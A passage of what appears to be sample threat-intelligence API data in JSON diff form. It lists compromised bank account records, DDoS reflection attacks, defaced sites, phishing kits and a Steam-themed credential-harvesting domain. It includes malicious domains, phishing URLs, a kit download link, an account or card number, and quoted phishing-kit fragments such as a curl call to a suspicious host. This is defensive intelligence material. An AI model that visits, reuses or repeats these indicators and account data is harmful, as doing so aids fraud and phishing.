"sourceType": null, + "stixGuid": "d1ce6a9a-76c5-fbba-a5db-9b72ac2a97c7", + "threatActor": { 
+ "name": "Zolotoe Leto", + "id": "2423e5cadf51f21ab36509377ba7f7d629503298", + "stixGuid": "e0b79cef-8eb0-7768-29a8-112bc66066cf", + "isAPT": false + }, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "92c0c55c48b22e70e4118535dc0a7b63134ec4ad", + "account": "4351391043068758", + "cnc": { + "cnc": "", + "port": null, + "domain": null, + "proto": null, + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": null, + "countryCode": null, + "countryName": null, + "ip": null + }, + "ipv6": null, + "url": null, + "stixGuid": null + }, + "dateAdd": "2015-07-20T15:33:41+00:00", + "dateIncident": "2015-07-09T20:00:00+00:00", + "evaluation": { + "admiraltyCode": "A2", + "credibility": 80, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "hash": "69ec671f1666120040d907fdd0cd577f", + "info": null, + "malware": null, + "oldId": "22984", + "operatorClabe": null, + "organization": { + "bic": null, + "bicRu": null, + "bsb": null, + "iban": null, + "name": "ОАО АКБ \"УРАЛ ФД\"", + "swift": null, + "clabe": null + }, + "person": { + "address": null, + "birthday": null, + "countryCode": null, + "email": null, + "name": null, + "region": null, + "passport": null, + "phone": null, + "state": null, + "taxNumber": null + }, + "seqUpdate": 1454699133295, + "sourceType": null, + "stixGuid": "50bc844f-25fe-17ef-b5f3-dc170684e718", + "threatActor": { + "name": "Zolotoe Leto", + "id": "2423e5cadf51f21ab36509377ba7f7d629503298", + "stixGuid": "e0b79cef-8eb0-7768-29a8-112bc66066cf", + "isAPT": false + }, + "type": "Person", + "displayOptions": { + "favouriteForCompanies": [], + "hideForCompanies": [ + 3146 + ], + "isHidden": false, + "isFavourite": false + } + } + ], + "settings": { + "search": { + "tags": [ + "id", + "type", + "operator", + "threat_actor", + "malware", + "source", + "severity", + "options", + 
"seqUpdate", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip", + "notification_id" + ], + "fields": [ + "account", + "type", + "operator", + "threat_actor", + "severity", + "source", + "malware", + "id", + "seqUpdate", + "domain", + "domain.tree", + "ip", + "cnc_domain", + "cnc_domain.tree", + "cnc_ip" + ], + "sorts": [ + "date_add", + "seqUpdate" + ] + } + }, + "seqUpdate": 1454699133295 + }, + "attacks/ddos":{ + "count": 44739317, + "items": [ + { + "id": "7927ec532db08b2e420b33cff2a9068ca8487e76", + "cnc": { + "cnc": "6lxdx.s3.amazonaws.com", + "port": null, + "domain": "6lxdx.s3.amazonaws.com", + "ipv4": null, + "ipv6": null, + "url": "http://6lxdx.s3.amazonaws.com" + }, + "dateBegin": "2019-10-23T05:34:25+00:00", + "dateEnd": "2019-10-23T05:35:16+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192868705", + "duration": 51, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11054565", + "stixGuid": "9232056c-0c7d-21a7-ac4f-a7fa243adc57", + "target": { + "ipv4": { + "asn": null, + "city": "Fairfield", + "region": "Connecticut", + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "3.15.14.164" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "695e81a7379155c4c3da31056675a3f2073dd931", + "cnc": { + "cnc": "6lmqc.s3.amazonaws.com", + "port": null, + "domain": "6lmqc.s3.amazonaws.com", + "ipv4": null, + "ipv6": null, + "url": "http://6lmqc.s3.amazonaws.com" + }, + "dateBegin": 
"2019-10-23T05:34:25+00:00", + "dateEnd": "2019-10-23T05:35:16+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192868443", + "duration": 51, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11058245", + "stixGuid": "6f0a316c-1c50-455b-b9e6-633aa24f7498", + "target": { + "ipv4": { + "asn": null, + "city": "Fairfield", + "region": "Connecticut", + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "3.15.14.164" + }, + "url": null, + "category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + }, + { + "id": "c5202c7177455777c702529a72a0f5a613c2c58a", + "cnc": { + "cnc": "plk4l.s3.amazonaws.co", + "port": null, + "domain": "plk4l.s3.amazonaws.co", + "ipv4": null, + "ipv6": null, + "url": "http://plk4l.s3.amazonaws.co" + }, + "dateBegin": "2019-10-22T22:33:35+00:00", + "dateEnd": "2019-10-22T22:34:49+00:00", + "dateReg": "2019-10-23T00:00:00+00:00", + "malware": null, + "evaluation": { + "admiraltyCode": "C2", + "credibility": 70, + "reliability": 60, + "severity": "orange", + "tlp": "green", + "ttl": 30 + }, + "messageLink": null, + "oldId": "192838071", + "duration": 74, + "protocol": "udp", + "seqUpdate": 1677065083, + "source": "honeypot_logs:1", + "sourceRowId": "11015631", + "stixGuid": "eb0e8ebf-f24b-7063-7702-1146335bb591", + "target": { + "ipv4": { + "asn": null, + "city": null, + "region": null, + "provider": "Amazon.com", + "countryCode": "US", + "countryName": "United States", + "ip": "18.191.111.103" + }, + "url": null, + 
"category": null, + "domainsCount": 0, + "port": 5353, + "domain": null + }, + "threatActor": null, + "requestData": { + "link": null, + "headers": {}, + "headersHash": null, + "body": null, + "bodyHash": null + }, + "type": "DNS Reflection", + "displayOptions": { + "isHidden": false, + "isFavourite": false + } + } + ], + "settings": { + "search": { + "tags": [ + "target_ip_country_name", + "target_category", + "cnc_ip_country_name", + "malware", + "cybercrime_new", + "cybercrime", + "threat_actor", + "company", + "company_id", + "type", + "options", + "target_ip", + "target_domain", + "id", + "source" + ], + "fields": [ + "target_ip", + "ip", + "target_domain", + "domain", + "target_domain.tree", + "target_ip_country_name", + "target_category", + "cnc_ip", + "cnc_ip_country_name", + "malware", + "type", + "cybercrime", + "cybercrime_new", + "threat_actor", + "seqUpdate", + "source", + "id" + ], + "sorts": [ + "last_seen", + "date_reg", + "seqUpdate" + ] + } + }, + "seqUpdate": 1677065083 + }, + "attacks/deface":{ + "count": 17197503, + "items": [ + { + "contacts": [], + "date": "2016-04-26T05:42:48Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695fabb1965600014bae7b", + "mirrorLink": "https://deface.ti-files.com/id:-59695fabb1965600014bae7b:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695fabb1965600014bae7b", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053029213, + "siteUrl": "http://med-supplies.de/?sky008", + "source": "defacer.id", + "targetDomain": "med-supplies.de", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS25504", + "city": null, + "countryCode": "DE", + "countryName": "Germany", + "ip": "89.200.168.133", + "provider": "Vautron Rechenzentrum AG", + "region": "Europe" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": 
false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T05:42:48Z", + "url": "http://med-supplies.de/?sky008" + }, + { + "contacts": [], + "date": "2016-04-26T11:27:37Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695f29b1965600014badf1", + "mirrorLink": "https://deface.ti-files.com/id:-59695f29b1965600014badf1:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695f29b1965600014badf1", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053047578, + "siteUrl": "http://www.distribuidora.com.mx/?sky008", + "source": "defacer.id", + "targetDomain": "www.distribuidora.com.mx", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS36444", + "city": null, + "countryCode": "US", + "countryName": "United States", + "ip": "192.240.166.56", + "provider": "NEXCESS-NET", + "region": "North America" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T11:27:37Z", + "url": "http://www.distribuidora.com.mx/?sky008" + }, + { + "contacts": [], + "date": "2016-04-26T11:18:28Z", + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 80, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "59695f1ab1965600014bade5", + "mirrorLink": "https://deface.ti-files.com/id:-59695f1ab1965600014bade5:", + "portalLink": "https://tap-stage.ci-kuber.gibdev.net/attacks/deface?searchValue=id:59695f1ab1965600014bade5", + "providerDomain": "defacer.id", + "seqUpdate": 1508430053049467, + "siteUrl": "http://petplanetshop.com.ar/api.php?sky008", + "source": "defacer.id", + "targetDomain": "petplanetshop.com.ar", + "targetDomainProvider": null, + "targetIp": { + "asn": "AS7303", + "city": "Rosario", + "countryCode": "AR", + "countryName": "Argentina", + "ip": 
"181.88.192.28", + "provider": "Telecom Argentina S.A.", + "region": "South America" + }, + "threatActor": { + "country": null, + "id": "9c94863e3602876b5e0150a7cbb926dda6556e03", + "isAPT": false, + "name": "Sky008", + "stixGuid": null + }, + "tsCreate": "2016-04-26T11:18:28Z", + "url": "http://petplanetshop.com.ar/api.php?sky008" + } + ], + "seqUpdate": 1508430053049467 + }, + "attacks/phishing_kit":{ + "count": 122834, + "items": [ + { + "id": "5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "hash": "5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "seqUpdate": 1523520752839, + "dateDetected": "2018-03-09T22:19:59+00:00", + "dateFirstSeen": "2018-03-09T22:19:59+00:00", + "dateLastSeen": "2018-03-27T13:18:38+00:00", + "downloadedFrom": [ + { + "date": "2018-03-09T22:19:59+03:00", + "url": "https://gt-mywyty186338.codeanyapp.com/cb.zip", + "phishingUrl": "", + "domain": "gt-mywyty186338.codeanyapp.com", + "fileName": "" + } + ], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606/file/5cf5afc22dfa08252e990c9e3fc51e287ff54dc53742767a7428dc31b25dd606", + "source": [ + "ci-PhishKit" + ], + "targetBrand": [], + "telegramIds": null, + "variables": [ + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/cargando.php", + "values": [ + "host: $mysql_host", + "login: ***********", + "password: ***************" + ] + }, + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/email-notify.php", + "values": [ + "host: 104.196.210.132", + "login: ****", + "password: *************" + ] + }, + { + "type": "DB", + "filePath": "./cb/pages/jsp-ns/index.php", + "values": [ + "host: 104.196.210.132", + "login: ****", + "password: *************" + ] + } + ], + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + 
"isFavourite": false, + "isHidden": false + }, + { + "id": "33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "hash": "33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "seqUpdate": 1523520763952, + "dateDetected": "2018-02-28T00:46:20+00:00", + "dateFirstSeen": "2018-02-28T00:46:20+00:00", + "dateLastSeen": "2018-03-27T13:18:48+00:00", + "downloadedFrom": [], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131/file/33b5093d2c5492ee49241bf3fd736a5013081ebc6a7cb4df6b295924e4a73131", + "source": [ + "api" + ], + "targetBrand": [], + "telegramIds": null, + "variables": [ + { + "type": "LOG", + "filePath": "./blnoxxue/blviituer.php", + "values": [ + "path: \"wtuds\" . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "LOG", + "filePath": "./blnoxxue/uogirue.php", + "values": [ + "path: $cache_folder . \"/\" . $_GET[\"altr\"]" + ] + }, + { + "type": "LOG", + "filePath": "./blnoxxue/xbbiyurt.php", + "values": [ + "path: $cache_folder . \"/\" . 
$_GET[\"altr\"]" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/blviituer.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/uogirue.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + }, + { + "type": "CURL", + "filePath": "./blnoxxue/xbbiyurt.php", + "values": [ + "url: \"http://solfinesew.pw/story2.php?pass=qwerty8&q={$_GET['altr']}\"", + "url: \"https://www.ask.com/web?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&qo=pagination&qsrc=998&page={$page}\"", + "url: \"http://www.google.com/search?q={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&start={$google_n}\"", + "url: \"http://search.yahoo.com/search?p={mb_strtolower(str_replace(\" \", \"+\", str_replace(\" \", \"+\", $keyword))_2)}&fr=yfp-t&fr2=sb-top&fp=1&b={$page}&pz=10&bct=0&xargs=0\"" + ] + } + ], + "threatActors": 
null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + }, + { + "id": "1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "hash": "1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "seqUpdate": 1523520767270, + "dateDetected": "2018-02-23T22:40:36+00:00", + "dateFirstSeen": "2018-02-23T22:40:36+00:00", + "dateLastSeen": "2018-03-27T13:18:51+00:00", + "downloadedFrom": [], + "emails": [], + "login": "PhishingKitFetcher", + "path": "https://tap.group-ib.com/api/v2/malware/phishing_kit/1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70/file/1ff2f4033df6dce75504c808d765889a69f9d9c024893cf02b6f65b48e652f70", + "source": [ + "api" + ], + "targetBrand": [], + "telegramIds": null, + "variables": null, + "threatActors": null, + "evaluation": { + "admiraltyCode": "B2", + "credibility": 80, + "reliability": 70, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "isFavourite": false, + "isHidden": false + } + ], + "settings": { + "search": { + "fields": [ + "company", + "domain", + "has_connection_vars", + "target_brand" + ], + "tags": [ + "203051", + "options", + "target_brand" + ] + } + }, + "seqUpdate": 1523520767270 + }, + "attacks/phishing_group":{ + "count": 8439182, + "items": [ + { + "brand": "Valve Steam", + "countPhishing": 20, + "date": { + "blocked": "2017-12-07T08:37:11+03:00", + "added": "2015-04-30T23:26:52+03:00", + "detected": "2017-10-11T20:36:03+03:00", + "blockedIndexed": null, + "updated": "2021-01-18T14:42:36+03:00" + }, + "domain": "accsteamorigin.sells.com.ua", + "domainInfo": { + "domain": "accsteamorigin.sells.com.ua", + "domainPuny": "accsteamorigin.sells.com.ua", + "expirationDate": null, + "registered": null, + "registrar": null, + "tld": "ua", + "title": "Steam Community", + "category": [] + }, + "domainTitle": "Steam Community", + "evaluation": { + 
"admiraltyCode": "C3", + "credibility": 50, + "reliability": 50, + "severity": "red", + "tlp": "amber", + "ttl": 0 + }, + "falsePositive": false, + "groupLifetime": 81361, + "id": "f2a145de56f5c3767eaeaa2dc8baff69ed157f4a34659b0611bf2530e3d34257", + "ip": [ + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line 
Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + }, + { + "ip": "91.194.251.186", + "countryCode": "UA", + "countryName": "Ukraine", + "provider": "TOV Dream Line Holding" + } + ], + "objective": [ + "Login harvest" + ], + "phishingKitArray": [], + "screenshot": { + "pageHtml": { + "hashSha256": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "filetype": "pageHtml", + "filename": "h:cfaea13d115982fe593364e5d2a4e47436681010e094eb752a78e92a469ee252", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "filetype": "pageScreen", + "filename": "s:536691c2f90954d9af264ebb947e5fde4425d91a34157d34518f4f2449e709b1", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "seqUpdate": 1430425612098642, + "signature": { + "resource": [], + "screen": [], + "manual": [ + "Steam_we_see_u" + ] + }, + "source": [ + "SafeSearch" + ], + "status": 1, + "threatActor": { + "id": "", + "name": "", + "nameIndexed": "", + "isAPT": false + }, + "uniqueTitles": [ + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + 
"faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + }, + { + "faviconHashes": { + "md5": "", + "sha1": "", + "sha256": "" + }, + "title": "Steam Community" + } + ], + "urlListLink": "", + "whitelist": false, + "phishing": [ + { + "id": "4c6c37c06977d8ba6ea9c3e356af7bbd248a1a6a189b4720c5fcb2d67dbc0254", + "url": 
"http://accsteamorigin.sells.com.ua/products?sort=default&size=30", + "date": { + "blocked": "2017-11-18T00:40:56+03:00", + "added": "2017-11-10T16:36:54+03:00", + "detected": "2017-11-10T16:36:54+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:afeb54bfc3cf4bd8ea984626ce01742be80c573b876961c1e37786ad86cc5a2a", + "filetype": "pageHtml", + "filename": "h:afeb54bfc3cf4bd8ea984626ce01742be80c573b876961c1e37786ad86cc5a2a", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "filetype": "pageScreen", + "filename": "s:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "bce7ef8bfc136d48ffe2888f4d8b9fa9e14640bb5901bdbcfc075e3ac4eeacb7", + "url": "http://accsteamorigin.sells.com.ua/products?size=10&page=4", + "date": { + "blocked": "2017-11-14T08:16:01+03:00", + "added": "2017-11-10T16:36:54+03:00", + "detected": "2017-11-10T16:36:54+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": 
"UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "filetype": "pageHtml", + "filename": "h:a28117d088b88babeb5ce148e1f73ce21a93b9d35361b6ac640b6c5633703272", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:c18b6529f3bb143a54d0ee96cc4955a7eb7441b7589ac7922d716bb694a0b654", + "filetype": "pageScreen", + "filename": "s:c18b6529f3bb143a54d0ee96cc4955a7eb7441b7589ac7922d716bb694a0b654", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "0f41b79fd897eaf5b6950a09712f3a0c7cc3042389beb813a2f021473bec6726", + "url": "http://accsteamorigin.sells.com.ua/products?page=5&sort=cheap", + "date": { + "blocked": "2017-12-07T08:37:11+03:00", + "added": "2017-11-04T16:38:46+03:00", + "detected": "2017-11-04T16:38:46+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "filetype": "pageHtml", + "filename": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "filetype": "pageScreen", + "filename": 
"s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "793197298b0240d00fd6717014e0fa30db98f7bf867254124d9a221ff9097fa6", + "url": "http://accsteamorigin.sells.com.ua/products?page=1&sort=cheap", + "date": { + "blocked": "2017-12-07T07:24:00+03:00", + "added": "2017-10-11T23:07:34+03:00", + "detected": "2017-10-11T23:07:34+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": "Steam Community", + "domain": { + "registrar": "", + "domain": "accsteamorigin.sells.com.ua", + "registered": "", + "title": "Steam Community", + "category": [], + "expiration": "", + "tld": "ua", + "puny": "accsteamorigin.sells.com.ua" + }, + "ip": { + "countryCode": "UA", + "city": "Kiev", + "provider": "TOV Dream Line Holding", + "ip": "91.194.251.186", + "countryName": "Ukraine" + }, + "phishingKit": [], + "screen": { + "pageHtml": { + "hashSha256": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "filetype": "pageHtml", + "filename": "h:5ffb301a1ca8ec018bb1f1b3b9999939c8ec584e4784366840e95a749e32fd46", + "mime": "pageHtml", + "fileHashMd5": "" + }, + "pageScreen": { + "hashSha256": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "filetype": "pageScreen", + "filename": "s:4bef02ccc066f86a4d0c81fc1150846d7dc49cadcd1b8dc79d07b5759be72896", + "mime": "pageScreen", + "fileHashMd5": "" + } + }, + "renderedUrls": [ + "" + ] + }, + { + "id": "52688b4712a11e4266f3acabb80872a69b251ea3484ca7f810dd2ef705947342", + "url": "http://accsteamorigin.sells.com.ua/akkauntyi-origin/c2?sort=expensive&page=1&size=30", + "date": { + "blocked": "2017-12-07T07:23:55+03:00", + "added": "2017-10-11T22:58:59+03:00", + "detected": "2017-10-11T22:58:59+03:00" + }, + "status": 1, + "objective": [ + "Login harvest" + ], + "source": [ + "SafeSearch" + ], + "client": null, + "title": 
